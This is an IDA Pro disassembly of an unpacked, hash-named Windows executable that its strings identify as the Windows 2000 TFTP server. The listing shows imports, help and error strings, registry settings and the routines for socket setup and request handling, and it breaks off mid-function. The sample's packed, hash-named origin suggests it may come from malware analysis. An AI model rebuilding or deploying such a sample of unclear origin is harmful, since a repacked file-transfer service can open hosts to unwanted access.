; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 4EEBA8BE6FF209E5B310843E2E997C0E ; File Name : u:\work\4eeba8be6ff209e5b310843e2e997c0e_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 1000000 ; Section 1. (virtual address 00001000) ; Virtual size : 00003310 ( 13072.) ; Section size in file : 00003310 ( 13072.) ; Offset to raw data for section: 00001000 ; Flags 60000020: Text Executable Readable ; Alignment : default include uni.inc ; see unicode subdir of ida for info on unicode .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Execute _text segment para public 'CODE' use32 assume cs:_text ;org 1001000h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing dword_1001000 dd 77DB82ACh dword_1001004 dd 77DB2985h dword_1001008 dd 77DB858Eh dword_100100C dd 77DB7D4Dh dword_1001010 dd 77DB2C54h dword_1001014 dd 77DC9694h ; sub_1001DEB+6Br ... dd 0 dword_100101C dd 77E9B0BBh dword_1001020 dd 77E94CA6h dword_1001024 dd 77E9C37Ah dword_1001028 dd 77F877E0h dword_100102C dd 77E9C4E4h ; sub_1002F31+1C3r ... dword_1001030 dd 77E8670Dh dword_1001034 dd 77E86F37h dword_1001038 dd 77E8668Ch ; sub_1001665:loc_1001762r ... dword_100103C dd 77E88778h ; sub_1001A91+1ABr dword_1001040 dd 77E8B217h ; sub_10018DB+B4r ... dword_1001044 dd 77E88D0Fh ; sub_10019F0+14r ... dword_1001048 dd 77E85304h dword_100104C dd 77F8AA7Dh ; sub_1001A91+B5r ... dword_1001050 dd 77FC9C41h dword_1001054 dd 77E8A6C8h ; sub_1001E73+9Er ... dword_1001058 dd 77F8AA4Ch ; sub_1001A91+4Er ... dword_100105C dd 77E94A02h, 77E9E673h, 77FC976Bh, 77E9310Fh ; sub_1001A91+2C1r ... dword_100106C dd 77E84B74h ; sub_100205A+4Er dword_1001070 dd 77F89789h dword_1001074 dd 77E9CFC6h dd 0 dword_100107C dd 78001DEAh dword_1001080 dd 78003E70h dword_1001084 dd 7800B426h dword_1001088 dd 78014EE9h dword_100108C dd 78014DABh dword_1001090 dd 7801D884h dword_1001094 dd 78001000h ; sub_100205A+93r ... dword_1001098 dd 78001EC9h dword_100109C dd 78012188h dword_10010A0 dd 780010EDh ; sub_1001F54+47r ... dword_10010A4 dd 7802A875h ; sub_1001DEB+8r dword_10010A8 dd 78017A09h dword_10010AC dd 7800C9ACh ; sub_10027E1+77r ... dword_10010B0 dd 78017E4Bh, 78022AA9h ; sub_1001665+1DBr dword_10010B8 dd 7802A38Bh ; sub_1001DEB+19r dword_10010BC dd 78003C1Eh dword_10010C0 dd 7800F56Ah dword_10010C4 dd 78003E5Ah dword_10010C8 dd 78003E64h dword_10010CC dd 78003E6Ah dword_10010D0 dd 7803BB70h dword_10010D4 dd 78025147h dword_10010D8 dd 7800BB9Eh dword_10010DC dd 7800F7DCh, 7800B908h ; .text:01003B7Ar dword_10010E4 dd 7801D1CFh ; sub_100333A+1B9r dword_10010E8 dd 78014B25h dword_10010EC dd 7800269Eh ; sub_1001665+C0r ... dd 0 dword_10010F4 dd 75031311h dword_10010F8 dd 75032B3Ch ; sub_1001A91+12Br ... dword_10010FC dd 75034A6Ah dword_1001100 dd 75035502h dword_1001104 dd 75032B57h ; sub_100230A+Fr ... dword_1001108 dd 7503D027h dword_100110C dd 75032B57h ; sub_1002A3D+40r ... ; --------------------------------------------------------------------------- locret_1001110: ; DATA XREF: sub_1001A91+10Fr retf ; --------------------------------------------------------------------------- db 0ACh, 3, 75h dword_1001114 dd 7503125Ah dword_1001118 dd 7503894Bh dword_100111C dd 75033284h ; sub_100205A+E7r ... dword_1001120 dd 75035413h ; sub_1002F31+64r ... dword_1001124 dd 75033A14h ; sub_1002F31+256r ... dword_1001128 dd 750390C0h dword_100112C dd 75033832h ; sub_100333A+1EBr dword_1001130 dd 7503306Fh ; sub_1002A3D+65r ... align 8 dword_1001138 dd 77347866h dword_100113C dd 773425A3h dd 0 dword_1001144 dd 77F82A70h dword_1001148 dd 77F8A557h dword_100114C dd 77FB6307h dword_1001150 dd 77F92A89h ; sub_100333A+95r dword_1001154 dd 77F97C81h ; sub_1002B5E+114r ... dword_1001158 dd 77F816E4h ; sub_1002A3D+FDr ... dword_100115C dd 77F8F1D6h dword_1001160 dd 77F9431Dh ; sub_10023D8+F2r dword_1001164 dd 77F936B1h dword_1001168 dd 77F912B1h ; sub_1002901+35r dword_100116C dd 77F8F73Ch dword_1001170 dd 77F979C8h dword_1001174 dd 77F8D7C7h ; sub_10018DB+D6r dword_1001178 dd 77F975A5h ; sub_1002F31+34Dr ... dd 2 dup(0) dd 37ECADD7h, 0 dd 4, 110h, 0 dd 4C00h, 0 dd 37ECADD7h, 0 dd 3, 310h, 0 dd 4D10h, 0 dd 37ECADD7h, 0 dd 6, 2 dup(0) dd 5020h, 0 dd 37ECADD7h, 0 dd 2, 1Ah, 0 db 90h db 0FEh, 0A7h, 0FFh aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999' db ' 22:17:18',0Ah,0 aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4o aWritable db 'writable',0 ; DATA XREF: sub_1001570+BFo ; sub_10037BF+121o align 4 aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6o aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1o ; sub_10037BF+F1o align 4 aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8o aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3o ; sub_10037BF+C1o aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9Ao aClients db 'clients',0 ; DATA XREF: sub_1001570+95o ; sub_10037BF+8Eo aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah ; DATA XREF: sub_1001570+8Do db 0 align 4 aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84o aDirectory db 'directory',0 ; DATA XREF: sub_1001570+7Fo ; sub_10037BF+5Co align 4 aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0 ; DATA XREF: sub_1001570+76o aSystemCurrentc db 'System\CurrentControlSet\Services\tftpd\parameters',0 ; DATA XREF: sub_1001570+71o ; sub_10037BF+13o align 10h aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68o db 0Ah,0 align 4 aTftpd_log db 'tftpd.log',0 ; DATA XREF: sub_1001570+63o ; sub_1001665+1D6o align 4 aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5Ao align 4 aTftpdroot db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55o ; sub_1003910+1Eo a? db '-?',0 ; DATA XREF: sub_1001570+10o align 4 aA db 'a+',0 ; DATA XREF: sub_1001665+1D1o align 4 aTftp db 'tftp',0 ; DATA XREF: sub_100205A+31o align 10h aUdp db 'udp',0 ; DATA XREF: sub_100205A+2Co aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0o align 10h aNoSuchUser db 'No such user',0 ; DATA XREF: .data:01005CDCo align 10h aFileAlreadyExi db 'File already exists',0 ; DATA XREF: .data:01005CD8o aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4o aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0o align 10h aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCCo align 4 aAccessViolatio db 'Access violation',0 ; DATA XREF: .data:01005CC8o align 4 aFileNotFound db 'File not found',0 ; DATA XREF: .data:01005CC4o align 4 aErrorUndefined db 'Error undefined',0 ; DATA XREF: .data:off_1005CC0o aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251Ao align 10h aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498o aBlksize db 'blksize',0 ; DATA XREF: sub_10023D8+4Eo aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2o aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197o ; sub_100333A+201o ... align 10h aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195o ; sub_100333A+1A0o align 4 aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139o ; sub_100333A+159o aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2o ; sub_100333A:loc_100341Fo align 10h aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9Fo ; sub_100333A:loc_10033E1o align 4 asc_100155C: ; DATA XREF: sub_1003910+7Fo unicode 0, <\>,0 dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0 ; =============== S U B R O U T I N E ======================================= sub_1001570 proc near ; CODE XREF: .text:01003B4Ap arg_0 = dword ptr 4 arg_4 = dword ptr 8 cmp [esp+arg_0], 1 push esi jle loc_1001646 mov eax, [esp+4+arg_4] mov esi, offset a? ; "-?" mov eax, [eax+4] loc_1001588: ; CODE XREF: sub_1001570+34j mov dl, [eax] mov cl, dl cmp dl, [esi] jnz short loc_10015AA test cl, cl jz short loc_10015A6 mov dl, [eax+1] mov cl, dl cmp dl, [esi+1] jnz short loc_10015AA inc eax inc eax inc esi inc esi test cl, cl jnz short loc_1001588 loc_10015A6: ; CODE XREF: sub_1001570+22j xor eax, eax jmp short loc_10015AF ; --------------------------------------------------------------------------- loc_10015AA: ; CODE XREF: sub_1001570+1Ej ; sub_1001570+2Cj sbb eax, eax sbb eax, 0FFFFFFFFh loc_10015AF: ; CODE XREF: sub_1001570+38j test eax, eax jnz loc_1001646 mov esi, ds:dword_10010D4 push offset asc_1005010 ; " ======================================"... call esi ; dword_10010D4 pop ecx push offset aTftpdroot ; "\\tftpdroot\\" push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aTftpd_log ; "tftpd.log" push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"... push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"... call esi ; dword_10010D4 pop ecx pop ecx push offset aDirectory ; "directory" push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"... call esi ; dword_10010D4 pop ecx push offset aClients ; "clients" push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aMasters ; "masters" push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aReadable ; "readable" push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n" call esi ; dword_10010D4 pop ecx pop ecx push offset aWritable ; "writable" push offset aOWritableFiles ; " o writable files keyname \"%s\"\n" call esi ; dword_10010D4 pop ecx pop ecx push 0FFFFFFFFh call ds:dword_10010EC pop ecx loc_1001646: ; CODE XREF: sub_1001570+6j ; sub_1001570+41j push offset off_1005CB0 call ds:dword_1001004 test eax, eax jnz short loc_100165B call ds:dword_1001038 loc_100165B: ; CODE XREF: sub_1001570+E3j push 0 call ds:dword_100101C pop esi retn sub_1001570 endp ; =============== S U B R O U T I N E ======================================= sub_1001665 proc near ; DATA XREF: .data:01005CB4o arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push ebp push esi push edi xor ebp, ebp push offset sub_1001DEB push offset aTftpd ; "Tftpd" mov dword_1006120, 30h mov dword_1006124, 2 mov dword_1006128, ebp mov dword_1006134, 1 mov dword_1006138, 4E20h mov dword_100612C, ebp mov dword_1006130, ebp call ds:dword_1001010 cmp eax, ebp mov dword_1006044, eax jz loc_1001762 mov esi, ds:dword_1001014 mov edi, offset dword_1006120 push edi push eax call esi ; dword_1001014 cmp eax, ebp jz loc_1001762 mov ebx, ds:dword_1001040 push ebp push ebp push ebp push ebp call ebx ; dword_1001040 push ebp push ebp push ebp push ebp mov dword_1005DDC, eax call ebx ; dword_1001040 cmp dword_1005DDC, ebp mov dword_1005DE0, eax jz short loc_100171C cmp eax, ebp jz short loc_100171C push offset dword_1006140 push 101h call ds:dword_10010FC cmp eax, 0FFFFFFFFh jnz short loc_1001735 call ds:dword_10010F8 loc_100171C: ; CODE XREF: sub_1001665+96j ; sub_1001665+9Aj ... push 1Fh call sub_1001E73 push 1 call ds:dword_10010EC pop ecx loc_100172C: ; CODE XREF: sub_1001665+218j ; sub_1001665+224j pop edi pop esi pop ebp xor eax, eax pop ebx retn 8 ; --------------------------------------------------------------------------- loc_1001735: ; CODE XREF: sub_1001665+AFj push edi mov dword_1006124, 4 push dword_1006044 mov dword_1006128, 7 mov dword_1006134, ebp mov dword_1006138, ebp call esi ; dword_1001014 cmp eax, ebp jnz short loc_100176A loc_1001762: ; CODE XREF: sub_1001665+57j ; sub_1001665+6Ej call ds:dword_1001038 jmp short loc_100171C ; --------------------------------------------------------------------------- loc_100176A: ; CODE XREF: sub_1001665+FBj push 9 pop ecx xor eax, eax mov edx, offset dword_10060C0 mov edi, edx rep stosd push edx call ds:dword_10010A4 pop ecx mov edx, [esp+10h+arg_0] dec edx mov ebx, (offset dword_1005E07+1) jz short loc_10017F3 mov eax, [esp+10h+arg_4] lea eax, [eax+edx*4] mov [esp+10h+arg_0], eax loc_1001797: ; CODE XREF: sub_1001665+18Cj mov eax, [esp+10h+arg_0] mov eax, [eax] cmp byte ptr [eax], 2Dh jnz short loc_10017F3 movsx ecx, byte ptr [eax+1] sub ecx, 64h jz short loc_10017C9 dec ecx jz short loc_10017BD dec ecx jnz short loc_10017E9 mov dword_1005DD8, 1 jmp short loc_10017E9 ; --------------------------------------------------------------------------- loc_10017BD: ; CODE XREF: sub_1001665+147j mov dword_1005DD4, 1 jmp short loc_10017E9 ; --------------------------------------------------------------------------- loc_10017C9: ; CODE XREF: sub_1001665+144j lea edi, [eax+2] or ecx, 0FFFFFFFFh xor eax, eax repne scasb not ecx sub edi, ecx mov eax, ecx mov esi, edi mov edi, ebx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb loc_10017E9: ; CODE XREF: sub_1001665+14Aj ; sub_1001665+156j ... sub [esp+10h+arg_0], 4 dec edx cmp edx, ebp ja short loc_1001797 loc_10017F3: ; CODE XREF: sub_1001665+125j ; sub_1001665+13Bj call sub_10037BF call sub_1003910 mov esi, ds:dword_10010A8 push ebx call esi ; dword_10010A8 cmp eax, 0FFFFFFFFh pop ecx jnz short loc_100182E call ds:dword_10010AC push ebx call ds:dword_10010B0 cmp eax, ebp pop ecx jnz loc_100171C push ebx call esi ; dword_10010A8 cmp eax, ebp pop ecx jnz loc_100171C loc_100182E: ; CODE XREF: sub_1001665+1A5j cmp dword_1005DD8, ebp jz short loc_1001857 push offset aA ; "a+" push offset aTftpd_log ; "tftpd.log" call ds:dword_10010B0+4 pop ecx cmp eax, ebp pop ecx mov dword_1005DD0, eax jnz short loc_1001857 mov dword_1005DD8, ebp loc_1001857: ; CODE XREF: sub_1001665+1CFj ; sub_1001665+1EAj push offset dword_10060C0 call ds:dword_10010B8 pop ecx call sub_10018DB call sub_10019F0 push 0FFFFFFFFh push dword_1005DDC call ds:dword_100103C cmp eax, ebp jz loc_100172C call ds:dword_1001038 jmp loc_100172C sub_1001665 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100188E proc near ; CODE XREF: sub_100205A+D5p ; sub_1002F31+2A8p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp push ecx push 3 push [ebp+arg_4] push [ebp+arg_0] call ds:dword_1001100 test eax, eax jz short loc_10018AE call ds:dword_1001038 xor eax, eax jmp short locret_10018D7 ; --------------------------------------------------------------------------- loc_10018AE: ; CODE XREF: sub_100188E+14j test [ebp+arg_8], 1 push 0 push 0FFFFFFFFh push [ebp+arg_0] jz short loc_10018C2 push offset loc_1001D74 jmp short loc_10018C7 ; --------------------------------------------------------------------------- loc_10018C2: ; CODE XREF: sub_100188E+2Bj push offset loc_1001DDB loc_10018C7: ; CODE XREF: sub_100188E+32j push [ebp+arg_4] lea eax, [ebp+var_4] push eax call ds:dword_1001174 mov eax, [ebp+var_4] locret_10018D7: ; CODE XREF: sub_100188E+1Ej leave retn 0Ch sub_100188E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_10018DB proc near ; CODE XREF: sub_1001665+1FEp var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ebx push esi mov esi, ds:dword_1001044 push edi push offset dword_1006080 call esi ; dword_1001044 push offset dword_1006020 call esi ; dword_1001044 mov eax, offset dword_1006098 mov dword_100609C, eax mov dword_1006098, eax mov eax, offset dword_1006038 mov dword_100603C, eax mov dword_1006038, eax lea eax, [ebp+var_4] push eax call sub_1001FA6 xor esi, esi test eax, eax jnz short loc_1001957 mov eax, [ebp+var_4] xor ebx, ebx cmp [eax], esi jbe short loc_100194F xor edi, edi loc_100192E: ; CODE XREF: sub_10018DB+72j mov ecx, [eax+edi+4] cmp ecx, esi jz short loc_1001947 cmp ecx, 100007Fh jz short loc_1001947 push ecx call sub_100205A mov eax, [ebp+var_4] loc_1001947: ; CODE XREF: sub_10018DB+59j ; sub_10018DB+61j inc ebx add edi, 18h cmp ebx, [eax] jb short loc_100192E loc_100194F: ; CODE XREF: sub_10018DB+4Fj push eax call ds:dword_10010A0 pop ecx loc_1001957: ; CODE XREF: sub_10018DB+46j push offset dword_10060A0 call ds:dword_1001170 cmp eax, esi jnz loc_10019EB mov eax, 0EA60h push esi push eax push eax push esi push offset sub_10029BA push offset dword_1006048 push dword_10060A0 call ds:dword_1001178 push esi push esi push esi push esi mov edi, eax call ds:dword_1001040 cmp eax, esi mov dword_1005DF8, eax jnz short loc_10019A2 mov eax, edi jmp short loc_10019EB ; --------------------------------------------------------------------------- loc_10019A2: ; CODE XREF: sub_10018DB+C1j push esi push 0FFFFFFFFh push esi push offset sub_1002219 push eax push offset dword_1005DFC call ds:dword_1001174 cmp eax, esi jnz short loc_10019EB mov ecx, offset dword_1006100 xor eax, eax mov edi, ecx push ecx stosd stosd stosd stosd stosd mov eax, dword_1005DF8 push offset dword_1005E00 mov dword_1006110, eax call sub_1003A44 cmp eax, esi jz short loc_10019E9 cmp eax, 3E5h jnz short loc_10019EB loc_10019E9: ; CODE XREF: sub_10018DB+105j xor eax, eax loc_10019EB: ; CODE XREF: sub_10018DB+89j ; sub_10018DB+C5j ... pop edi pop esi pop ebx leave retn sub_10018DB endp ; =============== S U B R O U T I N E ======================================= sub_10019F0 proc near ; CODE XREF: sub_1001665+203p mov eax, offset dword_1006078 push offset dword_1006060 mov dword_100607C, eax mov dword_1006078, eax call ds:dword_1001044 push 0 push 0EFD1Ch push 0 call ds:dword_1001048 mov dword_1005DEC, eax retn sub_10019F0 endp ; =============== S U B R O U T I N E ======================================= sub_1001A1F proc near ; CODE XREF: sub_10029BA+79p push ebx push esi mov ebx, offset dword_1006060 push edi push ebx xor esi, esi call ds:dword_1001058 mov eax, dword_1005DF0 sub eax, dword_1005DF4 cmp eax, 0Ah jbe short loc_1001A46 shr eax, 1 mov esi, eax jmp short loc_1001A4E ; --------------------------------------------------------------------------- loc_1001A46: ; CODE XREF: sub_1001A1F+1Fj cmp eax, 3 jbe short loc_1001A4E push 2 pop esi loc_1001A4E: ; CODE XREF: sub_1001A1F+25j ; sub_1001A1F+2Aj test esi, esi jbe short loc_1001A86 mov edi, esi loc_1001A54: ; CODE XREF: sub_1001A1F+65j mov eax, dword_1006078 mov esi, eax mov ecx, [eax] mov eax, [eax+4] mov [eax], ecx mov [ecx+4], eax push dword ptr [esi+30h] call ds:dword_1001054 push esi push 0 push dword_1005DEC call ds:dword_1001050 dec dword_1005DF0 dec edi jnz short loc_1001A54 loc_1001A86: ; CODE XREF: sub_1001A1F+31j push ebx call ds:dword_100104C pop edi pop esi pop ebx retn sub_1001A1F endp ; =============== S U B R O U T I N E ======================================= sub_1001A91 proc near ; CODE XREF: .text:01001DCCp ; .text:01001DE1p var_68 = byte ptr -68h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_30 = byte ptr -30h var_28 = dword ptr -28h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = byte ptr -10h var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_10 = byte ptr 14h arg_FF9C = dword ptr 0FFA0h arg_FFA0 = dword ptr 0FFA4h arg_FFA4 = dword ptr 0FFA8h arg_FFA8 = dword ptr 0FFACh arg_FFD4 = dword ptr 0FFD8h arg_FFD8 = dword ptr 0FFDCh arg_10004 = dword ptr 10008h mov eax, 10004h call sub_1003A3E push ebx push ebp xor ebp, ebp push esi push edi mov [esp+10h], ebp mov ebx, offset dword_1006060 loc_1001AAA: ; CODE XREF: sub_1001A91+291j lea eax, [esp+10h+arg_0] push eax push 4004667Fh push [esp+18h+arg_10004] call ds:dword_1001114 cmp eax, ebp jnz loc_1001D27 cmp [esp+1Ch+var_8], ebp jz loc_1001D65 xor eax, eax lea edi, [esp+1Ch+arg_10] stosd stosd stosd stosd push ebx stosd call ds:dword_1001058 mov eax, dword_1006078 inc dword_1005DF4 cmp eax, offset dword_1006078 jz short loc_1001B11 mov ecx, [eax] mov esi, eax mov eax, [eax+4] mov [eax], ecx mov [ecx+4], eax push dword ptr [esi+30h] call ds:dword_100105C+0Ch mov eax, [esi+30h] jmp short loc_1001B41 ; --------------------------------------------------------------------------- loc_1001B11: ; CODE XREF: sub_1001A91+64j inc dword_1005DF0 push 2FF6Ch push 8 push dword_1005DEC call ds:dword_100105C+8 mov esi, eax cmp esi, ebp jz loc_1001D5E push ebp push ebp push ebp push ebp call ds:dword_1001040 mov [esi+30h], eax loc_1001B41: ; CODE XREF: sub_1001A91+7Ej push ebx mov [esp+40h+arg_0], eax call ds:dword_100104C lea ebp, [esi+34h] mov ecx, 3FEFh xor eax, eax mov edi, ebp rep stosd stosb mov eax, [esp+40h+arg_FFD8] mov [esp+40h+var_1C], ebp mov [esp+40h+var_20], 0FFBDh mov [esp+40h+var_28], 10h mov [esi+1Ch], eax lea eax, [esp+40h+var_10] push 0 push eax lea eax, [esp+48h+var_28] lea edi, [esi+2Ch] push eax lea eax, [esi+0Ch] push eax lea eax, [esp+50h+var_30] push eax push edi lea eax, [esp+58h+var_20] push 1 push eax push [esp+60h+arg_FFD4] call dword ptr ds:locret_1001110 mov [esp+64h+var_48], eax mov ax, [esi+0Eh] push eax call ds:dword_100110C cmp [esp+68h+var_4C], 0 jz short loc_1001C34 call ds:dword_10010F8 cmp eax, 3E5h jnz loc_1001D2F mov eax, dword_1005DDC push 0FFFFFFFFh mov [esp+6Ch+var_40], eax mov eax, [esp+6Ch+var_28] mov [esp+6Ch+var_3C], eax lea eax, [esp+6Ch+var_40] push 0 push eax push 2 call ds:dword_100105C+4 cmp eax, 0FFFFFFFFh jz loc_1001D2F cmp eax, 102h jz loc_1001D2F test eax, eax jz loc_1001D2F lea eax, [esp+78h+var_68] push eax push 0 lea eax, [esp+80h+var_48] push edi push eax push [esp+88h+arg_FF9C] call ds:dword_1001108 test eax, eax jnz short loc_1001C34 call ds:dword_10010F8 jmp loc_1001CEA ; --------------------------------------------------------------------------- loc_1001C34: ; CODE XREF: sub_1001A91+129j ; sub_1001A91+196j push 0 push dword_1005DDC call ds:dword_100103C test eax, eax jz loc_1001D2F cmp dword ptr [edi], 2 jl loc_1001CEA xor edi, edi cmp [esp+70h+arg_FFA8], edi jz short loc_1001CDA mov ax, [ebp+0] push eax call ds:dword_1001104 movzx ecx, ax test ecx, ecx jle short loc_1001CB8 cmp ecx, 2 jle short loc_1001C81 cmp ecx, 4 jz short loc_1001CB8 cmp ecx, 5 jnz short loc_1001CB8 jmp short loc_1001CEA ; --------------------------------------------------------------------------- loc_1001C81: ; CODE XREF: sub_1001A91+1E2j cmp ax, 1 jnz short loc_1001C94 inc dword_10060C4 mov edi, offset sub_1002F31 jmp short loc_1001CA5 ; --------------------------------------------------------------------------- loc_1001C94: ; CODE XREF: sub_1001A91+1F4j cmp ax, 2 jnz short loc_1001CA5 inc dword_10060C8 mov edi, offset sub_100333A loc_1001CA5: ; CODE XREF: sub_1001A91+201j ; sub_1001A91+207j mov eax, [esp+74h+arg_FFA0] test edi, edi mov [esi+8], eax jz short loc_1001CEA push esi call edi ; sub_1002F31 jmp short loc_1001CEA ; --------------------------------------------------------------------------- loc_1001CB8: ; CODE XREF: sub_1001A91+1DDj ; sub_1001A91+1E7j ... push 0 push 4 push [esp+7Ch+arg_FFA0] inc dword_10060CC lea eax, [esp+80h+var_20] push eax lea eax, [esp+84h+var_30] push eax call sub_100230A jmp short loc_1001CEA ; --------------------------------------------------------------------------- loc_1001CDA: ; CODE XREF: sub_1001A91+1CBj mov eax, [esp+70h+arg_FFA4] push esi mov [esi+8], eax call sub_1002EC8 loc_1001CEA: ; CODE XREF: sub_1001A91+19Ej ; sub_1001A91+1BCj ... push ebx call ds:dword_1001058 mov eax, dword_1006078 mov dword ptr [esi+4], offset dword_1006078 mov [esi], eax push offset dword_1005DE8 mov [eax+4], esi mov dword_1006078, esi call ds:dword_100105C dec dword_1005DF4 push ebx call ds:dword_100104C xor ebp, ebp jmp loc_1001AAA ; --------------------------------------------------------------------------- loc_1001D27: ; CODE XREF: sub_1001A91+32j call ds:dword_10010F8 jmp short loc_1001D65 ; --------------------------------------------------------------------------- loc_1001D2F: ; CODE XREF: sub_1001A91+136j ; sub_1001A91+161j ... push ebx call ds:dword_1001058 mov eax, dword_1006078 mov dword ptr [esi+4], offset dword_1006078 mov [esi], eax push offset dword_1005DE8 mov [eax+4], esi mov dword_1006078, esi call ds:dword_100105C dec dword_1005DF4 loc_1001D5E: ; CODE XREF: sub_1001A91+9Dj push ebx call ds:dword_100104C loc_1001D65: ; CODE XREF: sub_1001A91+3Cj ; sub_1001A91+29Cj pop edi pop esi pop ebp xor eax, eax pop ebx add esp, 10004h retn 8 sub_1001A91 endp ; sp-analysis failed ; --------------------------------------------------------------------------- loc_1001D74: ; DATA XREF: sub_100188E+2Do push ecx push ebx push ebp push esi mov esi, offset dword_1006020 push edi mov edi, ds:dword_1001070 push esi xor ebp, ebp xor ebx, ebx call edi ; dword_1001070 loc_1001D8B: ; CODE XREF: .text:01001DA1j test eax, eax jnz short loc_1001DA7 push 0C8h call ds:dword_100106C push esi call edi ; dword_1001070 inc ebx cmp ebx, 7Dh jb short loc_1001D8B test eax, eax jz short loc_1001DD1 loc_1001DA7: ; CODE XREF: .text:01001D8Dj lea eax, [esp+10h] push eax push dword ptr [esp+1Ch] call sub_10021E5 test eax, eax jnz short loc_1001DC0 mov eax, [esp+10h] mov ebp, [eax+0Ch] loc_1001DC0: ; CODE XREF: .text:01001DB7j push esi call ds:dword_100104C push ebp push dword ptr [esp+1Ch] call sub_1001A91 loc_1001DD1: ; CODE XREF: .text:01001DA5j pop edi pop esi pop ebp xor eax, eax pop ebx pop ecx retn 8 ; --------------------------------------------------------------------------- loc_1001DDB: ; DATA XREF: sub_100188E:loc_10018C2o push 0 push dword ptr [esp+8] call sub_1001A91 xor eax, eax retn 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1001DEB proc near ; DATA XREF: sub_1001665+6o var_4 = byte ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx lea eax, [ebp+var_4] push eax call ds:dword_10010A4 inc dword_1006134 pop ecx lea eax, [ebp+var_4] push eax call ds:dword_10010B8 mov eax, [ebp+arg_0] pop ecx dec eax jz short loc_1001E68 dec eax jz short loc_1001E35 dec eax jz short loc_1001E1D dec eax dec eax jz short loc_1001E68 jmp short loc_1001E4B ; --------------------------------------------------------------------------- loc_1001E1D: ; CODE XREF: sub_1001DEB+2Aj push dword_1006040 call ds:dword_1001034 mov dword_1006124, 4 jmp short loc_1001E4B ; --------------------------------------------------------------------------- loc_1001E35: ; CODE XREF: sub_1001DEB+27j push dword_1006040 call ds:dword_1001074 mov dword_1006124, 7 loc_1001E4B: ; CODE XREF: sub_1001DEB+30j ; sub_1001DEB+48j push offset dword_1006120 push dword_1006044 call ds:dword_1001014 test eax, eax jnz short locret_1001E6F call ds:dword_1001038 jmp short locret_1001E6F ; --------------------------------------------------------------------------- loc_1001E68: ; CODE XREF: sub_1001DEB+24j ; sub_1001DEB+2Ej push 0 call sub_1001E73 locret_1001E6F: ; CODE XREF: sub_1001DEB+73j ; sub_1001DEB+7Bj leave retn 4 sub_1001DEB endp ; =============== S U B R O U T I N E ======================================= sub_1001E73 proc near ; CODE XREF: sub_1001665+B9p ; sub_1001DEB+7Fp arg_0 = dword ptr 4 push ebx push ebp push esi 